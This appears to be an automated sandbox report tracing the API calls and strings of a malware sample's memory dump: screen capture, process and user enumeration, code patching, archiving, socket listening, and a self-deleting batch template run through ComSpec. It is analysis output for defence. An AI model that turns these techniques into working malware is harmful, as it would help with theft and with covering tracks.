SelectObject.GDI32 ref: 00154172
BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00154193
DrawIcon.USER32(?,?,?,?), ref: 001541C5

Part of subcall function 0015332C: GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00153341
Part of subcall function 0015332C: GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 0015334C

SelectObject.GDI32(?,00000008), ref: 001541E1
DeleteObject.GDI32 ref: 001541E8
DeleteDC.GDI32 ref: 001541EF
DeleteDC.GDI32 ref: 001541F6
FreeLibrary.KERNEL32(?), ref: 00154206
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0015421C
FreeLibrary.KERNEL32(?), ref: 00154230

Strings

gdiplus.dll, xrefs: 0015408C
GdiplusStartup, xrefs: 001540A9
DISPLAY, xrefs: 001540E9
GdiplusShutdown, xrefs: 00154216

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156A69, Relevance: 37.4, APIs: 1, Instructions: 7

APIs

HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00165087, Relevance: 34.4, APIs: 16, Strings: 1, Instructions: 241

APIs

Part of subcall function 00151B16: CreateFileW.KERNEL32(00C01EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00151B2F
Part of subcall function 00151B16: GetFileSizeEx.KERNEL32(?,?), ref: 00151B42
Part of subcall function 00151B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00151B68
Part of subcall function 00151B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00151B80
Part of subcall function 00151B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00151B9E
Part of subcall function 00151B16: CloseHandle.KERNEL32 ref: 00151BA7

CreateMutexW.KERNEL32(00182974,00000001,?), ref: 0016512D
GetLastError.KERNEL32(?,?,00000001,?,?,?,00165452), ref: 0016513D
CloseHandle.KERNEL32 ref: 0016514B
CloseHandle.KERNEL32 ref: 00165229

Part of subcall function 00164BA2: memcpy.MSVCRT ref: 00164BB2

lstrlenW.KERNEL32(?), ref: 001651AD

Part of subcall function 00174181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001741A1
Part of subcall function 00174181: Process32FirstW.KERNEL32(?,?), ref: 001741C6
Part of subcall function 00174181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 0017421D
Part of subcall function 00174181: CloseHandle.KERNEL32 ref: 0017423B
Part of subcall function 00174181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00174257
Part of subcall function 00174181: memcmp.MSVCRT ref: 0017426F
Part of subcall function 00174181: CloseHandle.KERNEL32(?), ref: 001742E7
Part of subcall function 00174181: Process32NextW.KERNEL32(?,?), ref: 001742F3
Part of subcall function 00174181: CloseHandle.KERNEL32 ref: 00174306

ExitWindowsEx.USER32(00000014,80000000), ref: 001651DD
OpenEventW.KERNEL32(00000002,00000000,?), ref: 00165203
SetEvent.KERNEL32 ref: 00165210
CloseHandle.KERNEL32 ref: 00165217
IsWellKnownSid.ADVAPI32(00C01EC0,00000016), ref: 00165279
CreateEventW.KERNEL32(00182974,00000001,00000000,?), ref: 00165348
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00165361
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00165373
CloseHandle.KERNEL32(00000000), ref: 0016538A
CloseHandle.KERNEL32(?), ref: 00165390
CloseHandle.KERNEL32(?), ref: 00165396

Part of subcall function 00152FB7: ReleaseMutex.KERNEL32 ref: 00152FBB
Part of subcall function 00152FB7: CloseHandle.KERNEL32 ref: 00152FC2

Part of subcall function 0015E8A2: VirtualProtect.KERNEL32(00159777,?,00000040,?), ref: 0015E8BA
Part of subcall function 0015E8A2: VirtualProtect.KERNEL32(00159777,?,?,?), ref: 0015E92D

Part of subcall function 0016BAD3: memcpy.MSVCRT ref: 0016BAEE
Part of subcall function 0016BAD3: StringFromGUID2.OLE32(?), ref: 0016BB92

Part of subcall function 001599FA: LoadLibraryW.KERNEL32(?), ref: 00159A1C
Part of subcall function 001599FA: GetProcAddress.KERNEL32(?,?), ref: 00159A40
Part of subcall function 001599FA: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00159A78
Part of subcall function 001599FA: lstrlenW.KERNEL32(?), ref: 00159A90
Part of subcall function 001599FA: StrCmpNIW.SHLWAPI(?,?), ref: 00159AA4
Part of subcall function 001599FA: lstrlenW.KERNEL32(?), ref: 00159ABA
Part of subcall function 001599FA: memcpy.MSVCRT ref: 00159AC6
Part of subcall function 001599FA: FreeLibrary.KERNEL32 ref: 00159ADC
Part of subcall function 001599FA: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00159B1B
Part of subcall function 001599FA: NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00159B57
Part of subcall function 001599FA: NetApiBufferFree.NETAPI32(?), ref: 00159C02
Part of subcall function 001599FA: NetApiBufferFree.NETAPI32(00000000), ref: 00159C14
Part of subcall function 001599FA: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00159C33

Part of subcall function 00155433: CharToOemW.USER32(00C01EF0,?), ref: 00155444

Part of subcall function 0016B0C1: GetCommandLineW.KERNEL32 ref: 0016B0DB
Part of subcall function 0016B0C1: CommandLineToArgvW.SHELL32 ref: 0016B0E2
Part of subcall function 0016B0C1: StrCmpNW.SHLWAPI(?,00147F1C,00000002), ref: 0016B108
Part of subcall function 0016B0C1: LocalFree.KERNEL32 ref: 0016B134
Part of subcall function 0016B0C1: MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 0016B171
Part of subcall function 0016B0C1: memcpy.MSVCRT ref: 0016B184
Part of subcall function 0016B0C1: UnmapViewOfFile.KERNEL32 ref: 0016B1BD
Part of subcall function 0016B0C1: memcpy.MSVCRT ref: 0016B1E0
Part of subcall function 0016B0C1: CloseHandle.KERNEL32 ref: 0016B1F9

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 0016BEE3: CreateMutexW.KERNEL32(00182974,00000000,?), ref: 0016BF05

Part of subcall function 00159925: memcpy.MSVCRT ref: 0015993C
Part of subcall function 00159925: memcmp.MSVCRT ref: 0015995E
Part of subcall function 00159925: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0015998C
Part of subcall function 00159925: lstrcmpiW.KERNEL32(?), ref: 001599DC

Part of subcall function 00151BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00151BC6
Part of subcall function 00151BB5: CloseHandle.KERNEL32 ref: 00151BD5

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00165304

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001599FA, Relevance: 28.4, APIs: 13, Strings: 1, Instructions: 205

APIs

LoadLibraryW.KERNEL32(?), ref: 00159A1C
GetProcAddress.KERNEL32(?,?), ref: 00159A40
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00159A78
lstrlenW.KERNEL32(?), ref: 00159A90
StrCmpNIW.SHLWAPI(?,?), ref: 00159AA4
lstrlenW.KERNEL32(?), ref: 00159ABA
memcpy.MSVCRT ref: 00159AC6
FreeLibrary.KERNEL32 ref: 00159ADC
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00159B1B
NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00159B57

Part of subcall function 00164ED1: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00164EE5
Part of subcall function 00164ED1: PathUnquoteSpacesW.SHLWAPI(?), ref: 00164F4A
Part of subcall function 00164ED1: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00164F59
Part of subcall function 00164ED1: LocalFree.KERNEL32(00000001), ref: 00164F6D

NetApiBufferFree.NETAPI32(?), ref: 00159C02

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

Part of subcall function 00164461: PathSkipRootW.SHLWAPI(?), ref: 0016448B
Part of subcall function 00164461: GetFileAttributesW.KERNEL32(?), ref: 001644B8
Part of subcall function 00164461: CreateDirectoryW.KERNEL32(?,00000000), ref: 001644CC
Part of subcall function 00164461: SetLastError.KERNEL32(00000050), ref: 001644EF

Part of subcall function 00159633: LoadLibraryW.KERNEL32(?), ref: 00159657
Part of subcall function 00159633: GetProcAddress.KERNEL32(?,?), ref: 00159685
Part of subcall function 00159633: GetProcAddress.KERNEL32(?,?), ref: 0015969F
Part of subcall function 00159633: GetProcAddress.KERNEL32(?,?), ref: 001596BB
Part of subcall function 00159633: WTSGetActiveConsoleSessionId.KERNEL32 ref: 001596E8
Part of subcall function 00159633: FreeLibrary.KERNEL32 ref: 00159769

NetApiBufferFree.NETAPI32(00000000), ref: 00159C14
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00159C33

Part of subcall function 0016B70A: CreateDirectoryW.KERNEL32(?,00000000), ref: 0016B783
Part of subcall function 0016B70A: SetFileAttributesW.KERNEL32(?), ref: 0016B7A2
Part of subcall function 0016B70A: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 0016B7B9
Part of subcall function 0016B70A: GetLastError.KERNEL32(?,00000002,?,?), ref: 0016B7C6
Part of subcall function 0016B70A: CloseHandle.KERNEL32 ref: 0016B7FF

Part of subcall function 00157058: GetFileSizeEx.KERNEL32(00000000,?), ref: 0015708F
Part of subcall function 00157058: SetEndOfFile.KERNEL32 ref: 00157105
Part of subcall function 00157058: FlushFileBuffers.KERNEL32(?), ref: 00157110

Strings

.exe, xrefs: 00159BBC 00159C4D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015D2B1, Relevance: 27.2, APIs: 18, Instructions: 214

APIs

GetProcAddress.KERNEL32(?,?), ref: 0015D2D5
GetProcAddress.KERNEL32(?,?), ref: 0015D2F5
GetProcAddress.KERNEL32(?,?), ref: 0015D30E
GetProcAddress.KERNEL32(?,?), ref: 0015D327
GetProcAddress.KERNEL32(?,?), ref: 0015D340
GetProcAddress.KERNEL32(?,?), ref: 0015D359
GetProcAddress.KERNEL32(?,?), ref: 0015D376
GetProcAddress.KERNEL32(?,?), ref: 0015D393
GetProcAddress.KERNEL32(?,?), ref: 0015D3B0
GetProcAddress.KERNEL32(?,?), ref: 0015D3CD
GetProcAddress.KERNEL32(?,?), ref: 0015D3EA
GetProcAddress.KERNEL32(?,?), ref: 0015D407
GetProcAddress.KERNEL32(?,?), ref: 0015D424
GetProcAddress.KERNEL32(?,?), ref: 0015D441
GetProcAddress.KERNEL32(?,?), ref: 0015D45E
GetProcAddress.KERNEL32(?,?), ref: 0015D47B
GetProcAddress.KERNEL32(?,?), ref: 0015D498
GetProcAddress.KERNEL32(?,?), ref: 0015D4B5

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00159C8D, Relevance: 24.4, APIs: 10, Strings: 2, Instructions: 184

APIs

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00159CCE
PathRemoveFileSpecW.SHLWAPI(?), ref: 00159D17
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00159D3E
PathRemoveFileSpecW.SHLWAPI(?), ref: 00159D87
SetEvent.KERNEL32 ref: 00159D9A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00159DAD

Part of subcall function 0015E4B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0015E4E9
Part of subcall function 0015E4B6: Sleep.KERNEL32(000001F4), ref: 0015E57E

Part of subcall function 001644FB: FindFirstFileW.KERNEL32(?,?), ref: 0016452C
Part of subcall function 001644FB: FindNextFileW.KERNEL32(?,?), ref: 0016457E
Part of subcall function 001644FB: FindClose.KERNEL32 ref: 00164589
Part of subcall function 001644FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 00164595
Part of subcall function 001644FB: RemoveDirectoryW.KERNEL32(?), ref: 0016459C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00159DF1

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

Part of subcall function 001610E0: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0016113B
Part of subcall function 001610E0: RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001611A5
Part of subcall function 001610E0: RegFlushKey.ADVAPI32(00000000), ref: 001611D3
Part of subcall function 001610E0: RegCloseKey.ADVAPI32(00000000), ref: 001611DA

CharToOemW.USER32(?,?), ref: 00159E6F
CharToOemW.USER32(?,?), ref: 00159E81
ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00159EEC

Part of subcall function 00155482: CharToOemW.USER32(?,?), ref: 001554C8
Part of subcall function 00155482: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 001554FF
Part of subcall function 00155482: CloseHandle.KERNEL32(000000FF), ref: 00155527
Part of subcall function 00155482: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00155569
Part of subcall function 00155482: memset.MSVCRT ref: 0015557E
Part of subcall function 00155482: CloseHandle.KERNEL32(000000FF), ref: 001555B9

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00159CEB
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00159D5B

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001552FF, Relevance: 24.3, APIs: 8, Strings: 4, Instructions: 89

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 0015530F
GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 0015532D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00155339
memset.MSVCRT ref: 00155379
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 001553C6
CloseHandle.KERNEL32(?), ref: 001553DA
CloseHandle.KERNEL32(?), ref: 001553E0
FreeLibrary.KERNEL32 ref: 001553F4

Strings

userenv.dll, xrefs: 00155304
CreateEnvironmentBlock, xrefs: 00155327
DestroyEnvironmentBlock, xrefs: 00155333
D, xrefs: 001553BA

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0017611F, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 261

APIs

Part of subcall function 0016C43C: lstrlenW.KERNEL32 ref: 0016C443
Part of subcall function 0016C43C: memcpy.MSVCRT ref: 0016C4D1

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

getpeername.WS2_32(?,?,?), ref: 00176361

Part of subcall function 0017306E: memcmp.MSVCRT ref: 00173090

lstrcpyW.KERNEL32(?,0:0), ref: 001763E9

Part of subcall function 00173C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00173C98
Part of subcall function 00173C83: StrCmpIW.SHLWAPI(?,?), ref: 00173CA2

Part of subcall function 00172755: EnterCriticalSection.KERNEL32(00183510,?,001730AF,?,?,00000000), ref: 00172765
Part of subcall function 00172755: LeaveCriticalSection.KERNEL32(00183510,?,00000000), ref: 0017278F

WSAAddressToStringW.WS2_32(?,?,00000000), ref: 001763D5

Strings

mSER, xrefs: 00176176
hASS, xrefs: 0017617D
U, xrefs: 001761F1
lYPE, xrefs: 00176279
~EAT, xrefs: 00176280
hASV, xrefs: 00176287
kTAT, xrefs: 001762C3
tIST, xrefs: 001762CA
0, xrefs: 001763C4
0:0, xrefs: 001763DF

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00155482, Relevance: 22.5, APIs: 6, Strings: 5, Instructions: 109

APIs

Part of subcall function 0014E35B: GetTempPathW.KERNEL32(00000104,?), ref: 0014E376
Part of subcall function 0014E35B: PathAddBackslashW.SHLWAPI(?), ref: 0014E3A0
Part of subcall function 0014E35B: CreateDirectoryW.KERNEL32(?), ref: 0014E457
Part of subcall function 0014E35B: SetFileAttributesW.KERNEL32(?), ref: 0014E468
Part of subcall function 0014E35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 0014E481
Part of subcall function 0014E35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 0014E492

CharToOemW.USER32(?,?), ref: 001554C8
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 001554FF

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

CloseHandle.KERNEL32(000000FF), ref: 00155527
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00155569
memset.MSVCRT ref: 0015557E
CloseHandle.KERNEL32(000000FF), ref: 001555B9

Part of subcall function 0014E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0014E82F
Part of subcall function 0014E826: DeleteFileW.KERNEL32(?), ref: 0014E836

Part of subcall function 0014E348: CloseHandle.KERNEL32 ref: 0014E354

Strings

.bat, xrefs: 0015549C
@echo off%sdel /F "%s", xrefs: 001554D9
/c "%s", xrefs: 00155534
ComSpec, xrefs: 00155564
D, xrefs: 0015559E

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00175C75, Relevance: 22.3, APIs: 6, Strings: 5, Instructions: 60

APIs

LoadLibraryW.KERNEL32(cabinet.dll), ref: 00175C89

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

GetProcAddress.KERNEL32(?,FCICreate), ref: 00175CB8
GetProcAddress.KERNEL32(?,FCIAddFile), ref: 00175CC7
GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 00175CD6
GetProcAddress.KERNEL32(?,FCIDestroy), ref: 00175CE5

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

FreeLibrary.KERNEL32 ref: 00175D1A

Strings

cabinet.dll, xrefs: 00175C84
FCICreate, xrefs: 00175CB1
FCIAddFile, xrefs: 00175CBD
FCIFlushCabinet, xrefs: 00175CCC
FCIDestroy, xrefs: 00175CDB

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015357D, Relevance: 21.5, APIs: 12, Instructions: 144

APIs

Part of subcall function 00156861: memchr.MSVCRT ref: 0015689D
Part of subcall function 00156861: memcmp.MSVCRT ref: 001568BC

VirtualProtect.KERNEL32(?,001537D4,00000080,?), ref: 001535ED
VirtualProtect.KERNEL32(?,001537D4,00000000,?), ref: 00153756

Part of subcall function 00156A7D: memcpy.MSVCRT ref: 00156A9C

Part of subcall function 00156B09: memcmp.MSVCRT ref: 00156B29

GetCurrentThread.KERNEL32 ref: 001536AC
GetThreadPriority.KERNEL32 ref: 001536B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 001536C6
Sleep.KERNEL32(00000000), ref: 001536CA
memcpy.MSVCRT ref: 001536D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 001536EA
SetThreadPriority.KERNEL32 ref: 001536F2

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

GetTickCount.KERNEL32 ref: 0015370D
GetTickCount.KERNEL32 ref: 0015371A
Sleep.KERNEL32(00000000), ref: 00153727

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014CECC, Relevance: 21.3, APIs: 14, Instructions: 290

APIs

Sleep.KERNEL32(00003A98), ref: 0014CEE3

Part of subcall function 00155AF5: InitializeCriticalSection.KERNEL32 ref: 00155AFC

InitializeCriticalSection.KERNEL32(?), ref: 0014CF47
memset.MSVCRT ref: 0014CF5E
InitializeCriticalSection.KERNEL32(?), ref: 0014CF78

Part of subcall function 0014FBE6: memset.MSVCRT ref: 0014FBFD
Part of subcall function 0014FBE6: memset.MSVCRT ref: 0014FCD4

InitializeCriticalSection.KERNEL32(?), ref: 0014CFD2
memset.MSVCRT ref: 0014CFDD
memset.MSVCRT ref: 0014CFEB

Part of subcall function 0016FA0A: EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,0014D004,00000000), ref: 0016FB0C
Part of subcall function 0016FA0A: LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,0014D004,00000000), ref: 0016FB4D
Part of subcall function 0016FA0A: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0016FB5C
Part of subcall function 0016FA0A: SetEvent.KERNEL32 ref: 0016FB6C
Part of subcall function 0016FA0A: GetExitCodeThread.KERNEL32(?,?), ref: 0016FB80
Part of subcall function 0016FA0A: CloseHandle.KERNEL32 ref: 0016FB96

Part of subcall function 0014BFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 0014C08A
Part of subcall function 0014BFFE: GetHandleInformation.KERNEL32(?,?), ref: 0014C09C
Part of subcall function 0014BFFE: socket.WS2_32(?,00000001,00000006), ref: 0014C0CF
Part of subcall function 0014BFFE: socket.WS2_32(?,00000002,00000011), ref: 0014C0E0
Part of subcall function 0014BFFE: closesocket.WS2_32(00000002), ref: 0014C0FF
Part of subcall function 0014BFFE: closesocket.WS2_32 ref: 0014C106
Part of subcall function 0014BFFE: memset.MSVCRT ref: 0014C1C8
Part of subcall function 0014BFFE: memcpy.MSVCRT ref: 0014C3C8

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

WaitForMultipleObjects.KERNEL32(?,?,00000000,0000EA60), ref: 0014D061

Part of subcall function 00155B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,0014D091,?,?,00000000,0000EA60,00000000), ref: 00155B48
Part of subcall function 00155B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00155B6C
Part of subcall function 00155B40: CloseHandle.KERNEL32 ref: 00155B7C
Part of subcall function 00155B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,0014D091,?,?,00000000,0000EA60,00000000), ref: 00155BAC

Part of subcall function 0014C41C: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0014C44D
Part of subcall function 0014C41C: WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0014C4DF
Part of subcall function 0014C41C: SetEvent.KERNEL32 ref: 0014C532
Part of subcall function 0014C41C: SetEvent.KERNEL32 ref: 0014C56B
Part of subcall function 0014C41C: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0014C5F0

Part of subcall function 0015229C: EnterCriticalSection.KERNEL32(?,?,?,?,?,0014D154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 001522BD
Part of subcall function 0015229C: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,0014D154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 001522D9

Part of subcall function 00153172: memset.MSVCRT ref: 0015328F
Part of subcall function 00153172: memcpy.MSVCRT ref: 001532A2
Part of subcall function 00153172: memcpy.MSVCRT ref: 001532B8

Part of subcall function 00172D0B: accept.WS2_32(?,0000EA60), ref: 00172D2C
Part of subcall function 00172D0B: WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00172D3E
Part of subcall function 00172D0B: WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,0014D163,?), ref: 00172D6F
Part of subcall function 00172D0B: shutdown.WS2_32(?,00000002), ref: 00172D87
Part of subcall function 00172D0B: closesocket.WS2_32 ref: 00172D8E
Part of subcall function 00172D0B: WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,0014D163), ref: 00172D95

Part of subcall function 0014F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0014F82D

Part of subcall function 0014C5FE: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,0014D203,?,?,00000000,?,?,?,?,00000000), ref: 0014C631
Part of subcall function 0014C5FE: memcmp.MSVCRT ref: 0014C67F
Part of subcall function 0014C5FE: SetEvent.KERNEL32 ref: 0014C6C0
Part of subcall function 0014C5FE: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,0014D203,?,?,00000000,?), ref: 0014C6ED

Part of subcall function 00155C67: EnterCriticalSection.KERNEL32(00C01F3C,?,?,00000001,00164EA8,?,?,00000001), ref: 00155C70
Part of subcall function 00155C67: LeaveCriticalSection.KERNEL32(00C01F3C,?,00000001,00164EA8,?,?,00000001), ref: 00155C7A
Part of subcall function 00155C67: WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00155CA0
Part of subcall function 00155C67: EnterCriticalSection.KERNEL32(00C01F3C,?,00000001,00164EA8,?,?,00000001), ref: 00155CB8
Part of subcall function 00155C67: LeaveCriticalSection.KERNEL32(00C01F3C,?,00000001,00164EA8,?,?,00000001), ref: 00155CC2

CloseHandle.KERNEL32(?), ref: 0014D260
CloseHandle.KERNEL32(?), ref: 0014D26D

Part of subcall function 0016FE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,0016FB19,?,77C475F0,7C809F91,?,?,?,?,0014D004,00000000), ref: 0016FE4D
Part of subcall function 0016FE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,0016FB19,?,77C475F0,7C809F91,?,?,?,?,0014D004,00000000), ref: 0016FE84

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0014D283

Part of subcall function 0014FCFF: memset.MSVCRT ref: 0014FD0F

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0014D2A2
CloseHandle.KERNEL32(?), ref: 0014D2AF
DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0014D2B9

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 00155B10: CloseHandle.KERNEL32 ref: 00155B20
Part of subcall function 00155B10: DeleteCriticalSection.KERNEL32(?,?,00C01F30,00164EB9,?,?,00000001), ref: 00155B37

Part of subcall function 0014CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 0014CEB9

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015338D, Relevance: 20.3, APIs: 7, Strings: 3, Instructions: 143

APIs

GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 001533AB
GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 001533B6
GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 001533C1

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

lstrcmpiW.KERNEL32(?), ref: 0015344E
memcpy.MSVCRT ref: 00153471

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0015349C
memcpy.MSVCRT ref: 001534CA

Strings

GdipGetImageEncodersSize, xrefs: 0015339C
GdipGetImageEncoders, xrefs: 001533AD
GdipSaveImageToStream, xrefs: 001533B8

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016B33E, Relevance: 20.3, APIs: 8, Strings: 2, Instructions: 107

APIs

memcpy.MSVCRT ref: 0016B364
CreateFileMappingW.KERNEL32(000000FF,?,08000004,00000000,00001000,00000000), ref: 0016B385
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00001000), ref: 0016B39D

Part of subcall function 0016AF22: UnmapViewOfFile.KERNEL32 ref: 0016AF2E
